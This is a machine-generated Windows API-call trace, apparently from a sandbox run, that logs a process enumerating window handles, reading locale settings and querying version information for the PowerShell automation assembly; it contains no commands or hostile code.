	[0945.421] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1820
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x16ac
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1858
	[0945.421] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1664
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x10b4
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x10ac
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x10ec
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1068
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x17e0
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x102c
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x17a4
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1050
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1694
	[0945.422] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1770
	[0945.423] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1720
	[0945.423] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x165c
	[0945.423] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1578
	[0945.423] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x16c0
	[0945.423] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x161c
	[0945.423] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1638
	[0945.424] GetWindow (hWnd=0x106c0, uCmd=0x4) returned 0x0
	[0945.425] IsWindowVisible (hWnd=0x106c0) returned 0
	[0945.425] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x15c8
	[0945.425] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1554
	[0945.425] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1674
	[0945.425] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1520
	[0945.425] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x14bc
	[0945.425] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xf8c
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xe9c
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1434
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x14ec
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xfcc
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x12ac
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1484
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x934
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xc0c
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xb08
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x948
	[0945.426] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1178
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x13e0
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xcd0
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x13fc
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xdc8
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xc18
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xc2c
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xa1c
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1244
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xdb0
	[0945.427] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1398
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1358
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1370
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1340
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x130c
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x12c0
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x12e4
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1270
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1298
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x120c
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x122c
	[0945.428] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x11c4
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x11b0
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1188
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1148
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1160
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x10fc
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xe34
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xea4
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x514
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xe48
	[0945.429] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xbc8
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xdf8
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x318
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xcac
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x8bc
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xf9c
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xf48
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xe40
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xecc
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xeb8
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xe80
	[0945.430] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xe98
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xe60
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xee4
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xf00
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xdf0
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xe1c
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xdd0
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xd94
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xd74
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xd00
	[0945.431] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xcd8
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xc84
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xca4
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xc64
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xc24
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xb84
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xbac
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x384
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xab8
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x33c
	[0945.432] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xa44
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xa64
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x8a8
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xaf0
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x88c
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xb04
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x910
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x230
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xac0
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xab4
	[0945.433] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xaac
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x3d0
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x978
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xa7c
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x59c
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xa88
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xa6c
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xa68
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x9f8
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xa04
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x924
	[0945.434] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x8dc
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x7dc
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x768
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x764
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x820
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x810
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x794
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x83c
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x7ac
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xb44
	[0945.435] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x6bc
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0xb5c
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x838
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.436] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x4d0
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x818
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x5b8
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x494
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x1ec
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x440
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x7e8
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x730
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x2c8
	[0945.437] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x10dcc0 | out: lpdwProcessId=0x10dcc0) returned 0x31c
	[0946.021] WerSetFlags () returned 0x0
	[0946.031] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0946.031] CoTaskMemFree (pv=0x0) 
	[0946.032] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10e028, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10e020 | out: pulNumLanguages=0x10e028, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10e020) returned 1
	[0946.033] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10e028, pwszLanguagesBuffer=0x2e3f1d8, pcchLanguagesBuffer=0x10e020 | out: pulNumLanguages=0x10e028, pwszLanguagesBuffer=0x2e3f1d8, pcchLanguagesBuffer=0x10e020) returned 1
	[0946.039] CoTaskMemAlloc (cb=0x24) returned 0x309a90
	[0946.039] GetUserDefaultLocaleName (in: lpLocaleName=0x309a90, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0946.039] CoTaskMemFree (pv=0x309a90) 
	[0946.816] CoTaskMemAlloc (cb=0x104) returned 0x2f50b0
	[0946.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f50b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.816] CoTaskMemFree (pv=0x2f50b0) 
	[0946.818] CoTaskMemAlloc (cb=0x104) returned 0x2f50b0
	[0946.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f50b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.818] CoTaskMemFree (pv=0x2f50b0) 
	[0946.821] CoTaskMemAlloc (cb=0x104) returned 0x2f50b0
	[0946.821] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2f50b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0946.821] CoTaskMemFree (pv=0x2f50b0) 
	[0946.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0946.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0946.832] SetErrorMode (uMode=0x1) returned 0x1
	[0946.832] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10dca0 | out: lpFileInformation=0x10dca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0946.832] SetErrorMode (uMode=0x1) returned 0x1
	[0946.832] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10df10 | out: lpdwHandle=0x10df10) returned 0x94c
	[0946.834] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e42a68 | out: lpData=0x2e42a68) returned 1
	[0946.835] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10de88, puLen=0x10de80 | out: lplpBuffer=0x10de88*=0x2e42b04, puLen=0x10de80) returned 1
	[0946.835] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42be0, puLen=0x10ddf0) returned 1
	[0946.835] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0946.835] CoTaskMemAlloc (cb=0x2e) returned 0x304800
	[0946.835] lstrcpyW (in: lpString1=0x304800, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0946.835] CoTaskMemFree (pv=0x304800) 
	[0946.835] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42c34, puLen=0x10ddf0) returned 1
	[0946.835] lstrlenW (lpString="System.Management.Automation") returned 28
	[0946.835] CoTaskMemAlloc (cb=0x3c) returned 0x288fd0
	[0946.835] lstrcpyW (in: lpString1=0x288fd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0946.835] CoTaskMemFree (pv=0x288fd0) 
	[0946.835] VerQueryValueW (in: pBlock=0x2e42a68, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10ddf8, puLen=0x10ddf0 | out: lplpBuffer=0x10ddf8*=0x2e42c90, puLen=0x10ddf0) returned 1
	[0946.835] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0946.835] CoTaskMemAlloc (cb=0x20) returned 0x309af0
	[0946.835] lstrcpyW (in: lpString1=0x309af0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0946.835] CoTaskMemFree (pv=0x309af0) 
